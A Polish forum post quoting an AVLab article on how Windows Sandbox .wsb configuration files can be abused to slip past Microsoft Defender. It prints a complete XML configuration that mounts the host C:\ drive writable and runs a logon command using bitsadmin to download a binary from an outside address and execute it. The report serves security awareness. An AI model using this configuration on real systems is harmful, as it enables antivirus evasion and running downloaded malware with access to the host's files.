10.12.2020, 17:34
Wracam do tematu piaskownicy Windowsowej, ponieważ ciekawa informacja o możliwości jej wykorzystania w celu ataku na system ukazała się na łamach AVLab.
Cytat:Funkcja Windows Sandbox zostałaCałość poniżej[Aby zobaczyć linki, zarejestruj się tutaj]
do Windows 10 Pro i Windows 10 Enterprise jako uzupełnienie zabezpieczeń systemowych przed exploitami. Niestety nie w pełni zostało to przetestowane pod kątem bezpieczeństwa, ponieważ początkowo funkcja piaskownicy miała pomagać w walce przeciwko exploitom na antywirusa Microsoft Defender. Używanie exploitów to niebezpieczny proceder, ponieważ za pomocą luki w antywirusie możliwe jest uruchomienie kodu z uprawnieniami systemowymi. „Sandboksowanie” miało przed tym chronić. I zamiast zabezpieczeń mamy nowy sposób używania systemowych funkcji do oszukiwania antywirusa Microsoft Defender.
(...)
Windows Sandbox może używać plików z rozszerzeniem *.WSB jako dodatkowej konfiguracji dla maszyny wirtualnej. Jest to zwykły plik XML z informacjami technicznymi np. ilościami rdzeni CPU, współdzieleniem schowka, karty sieciowej itp. Więcej danych na ten temat podaje firma Microsoft na[Aby zobaczyć linki, zarejestruj się tutaj]
oraz[Aby zobaczyć linki, zarejestruj się tutaj]
. Dodajmy, że rozszerzenie WSB jest domyślne skojarzone z programem WindowsSandbox.exe.
Internauta opisał[Aby zobaczyć linki, zarejestruj się tutaj]
jak obejść zabezpieczenia antywirusa Microsoft Defender za pomocą Windows Sandbox. Stworzył konfigurację XML zawierającą polecenia pobierające szkodliwy plik.
Tym oto sposobem zespoły red-team i cyberprzestępcy uzyskali nową sposobność na obchodzenie zabezpieczeń Windows. Brawo!Kod:<Configuration>
<MappedFolders>
<MappedFolder>
<HostFolder>C:\</HostFolder>
<SandboxFolder>C:\Users\WDAGUtilityAccount\UserFiles</SandboxFolder>
<ReadOnly>false</ReadOnly>
</MappedFolder>
</MappedFolders>
<LogonCommand>
<Command>C:\Users\ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://192.168.0.4/cs_wsb_test.bin "%APPDATA%\cs.exe">nul&start %APPDATA%\cs.exe</Command>
</LogonCommand>
</Configuration>
[Aby zobaczyć linki, zarejestruj się tutaj]
"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"